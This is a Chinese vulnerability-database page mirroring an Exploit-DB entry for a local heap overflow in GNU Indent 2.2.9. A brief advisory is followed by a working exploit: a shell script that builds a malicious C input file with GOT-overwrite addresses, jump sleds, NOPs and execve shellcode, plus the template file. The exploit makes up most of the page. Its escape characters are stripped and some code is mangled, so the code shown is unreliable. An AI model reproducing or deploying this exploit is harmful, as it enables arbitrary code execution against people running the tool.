GNU Indent 2.2.9 – Local Heap Overflow

GNU Indent 2.2.9 – Local Heap Overflow

漏洞ID 1054332 漏洞类型
发布时间 2003-12-26 更新时间 2003-12-26
图片[1]-GNU Indent 2.2.9 – Local Heap Overflow-安全小百科CVE编号 N/A
图片[2]-GNU Indent 2.2.9 – Local Heap Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23479
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9297/info

It has been reported that GNU Indent may be prone to a local heap overflow vulnerability that can be exploited through a malicious C source input file. It has been reported that indent copies data from the file to a 1000 byte long buffer without sufficient boundary checking. A heap overflow condition can be triggered, which may result in memory being overwritten and, ultimately, malicious code execution with the privileges of the user running indent.

GNU Indent version 2.2.9 has been reported to be prone this issue, however, other versions may be affected as well. 

-------------------------------------prepare.sh--------------------------------------------

#!/bin/sh

# these addresses are working on indent 2.2.9 from
# slackware 9.0

# what_to_write
#
# it should be 2bytes aligned because it have to
# point to one of xeb from jmps. If it points
# to x08 - exploitation will fail
FD=`echo -e "x40xa4x05x08"`

# where_to_write-0x8
#
# it is good idea to point it to free() field in GOT
BK=`echo -e "xc0x7dx05x08"`

# change all 'JP' to xebx08 (relative jmp to $+8 bytes)
sed -e "s/JP/`echo -e "xebx08"`/g" winnie-template.c > temp.c

# change all 'N' to x90 (NOP)
sed -e "s/NNNNNNNNNNNNNNN/`echo -e "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"`/" temp.c > winnie.c

# change 'S's to shellcode
sed -e "s/SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS/`echo -e "x31xdbx89xd8xb0x17xcdx80xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx
89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdcxffxffxff/bin/sh"`/" winnie.c > temp.c

# exploit with this shellcode is quite useless, because
# it is simple execve(shell) shellcode. If you want to
# change shellcode, first prepare winnie-template.c -
# change 'SSSS...' len to len of your new shellcode,
# but len of whole 'JP...NNN...SSS' should remain the same.
# You can remove few 'JP's. You have to leave few NOPs
# before shellcode, because one of jmp's will land in them
# (this is to be sure that no jmp will land in the middle
# of shellcode. When you changed template, change sed line
# above - change 'SSSS...' len and shellcode.


# change 'dddd' 'eeee' 'ffff' to 0xfffffffc (-4)
sed -e "s/dddd/`echo -e "xfcxffxffxff"`/" temp.c > winnie.c
sed -e "s/eeee/`echo -e "xfcxffxffxff"`/" winnie.c > temp.c
sed -e "s/ffff/`echo -e "xfcxffxffxff"`/" temp.c > winnie.c

# change 'gggg' to FD (what_to_write)
sed -e "s/gggg/$FD/" winnie.c > temp.c

# change 'hhhh' to BK (where_to_write-8)
sed -e "s/hhhh/$BK/" temp.c > winnie.c

# 'iiii' is prev_size, but we don't need to change it
# Left it untouched

# change 'jjjj' to 0xfffffff1 (size field, pointing to these
# three (-4))
sed -e "s/jjjj/`echo -e "xf1xffxffxff"`/" winnie.c > temp.c

# change 'llll' to some readable value (on stack for example)
# it is 'next' field of overwritten buf_break_list struct
sed -e "s/llll/`echo -e "x40xffxffxbf"`/" temp.c > winnie.c

rm temp.c

-------------------------------------winnie-template.c--------------------------------------------

nt main(int argc, char **argv)
{
    printf("W1nN13 Th3 p00H H4ck1n6 SqU4dr0n pR0udlY Pr3z3n7z:n"
           "0-day P0f f0R indent-2.2.9 bUFF3r oV3rFl0W vU1n3r4b1l1tyn");

  asm
        (
        "nopn"
        "nopn"
        "nopn"
        "nopn"
        "nopn"
        "jmp continuen"
        ".string "JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJP
JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJ
PJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJP
JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJ
PJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJP
JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"n"
        ".string "cccddddeeeeffffgggghhhhiiiijjjjkkkkllll"n"
        "continue:n"
        "nopn"
        "nopn"
        :);
  return 0;
}

相关推荐: Sun Management Center 3.0/3.5 – Error Message Information Disclosure

Sun Management Center 3.0/3.5 – Error Message Information Disclosure 漏洞ID 1054230 漏洞类型 发布时间 2003-10-22 更新时间 2003-10-22 CVE编号 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享